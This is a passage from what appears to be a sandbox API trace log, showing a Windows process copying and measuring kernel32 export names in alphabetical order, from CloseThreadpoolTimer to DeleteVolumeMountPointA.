lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.940] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.940] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.940] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.940] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.940] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.940] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.940] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.940] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.940] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.941] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.941] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.941] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.941] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.941] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.941] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.941] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.941] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.941] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.941] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.941] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.941] lstrlenA (lpString="COPYFILEA") returned 9 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.941] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.941] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.941] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.941] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.941] lstrlenA (lpString="COPYFILEW") returned 9 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.941] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.941] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.942] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.942] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.942] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.942] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.942] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.942] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.942] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.942] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.942] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.942] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.942] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.942] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.942] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.942] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.942] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.942] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.942] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.942] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.942] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.943] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.943] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.943] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.943] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.943] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.943] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.943] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.943] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.943] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.943] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.943] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.943] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.943] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.943] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.943] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.943] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.943] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.943] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.944] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.944] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.944] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.944] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.944] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.944] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.944] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.944] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.944] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.944] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.944] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.944] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.944] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.944] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.944] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.944] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.944] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.944] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.945] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.945] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.945] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.945] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.945] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.945] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.945] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.945] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.945] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.945] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.945] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.945] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.945] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.945] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.945] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.945] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.945] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.945] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.945] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.945] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.946] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.946] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.946] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.946] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.946] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.946] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.946] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.946] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.946] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.946] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.946] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.946] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.946] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.946] lstrlenA (lpString="DELETEATOM") returned 10 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.946] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.946] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.946] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.946] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.946] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.946] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.947] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.947] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.947] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.947] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.947] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.947] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.947] lstrlenA 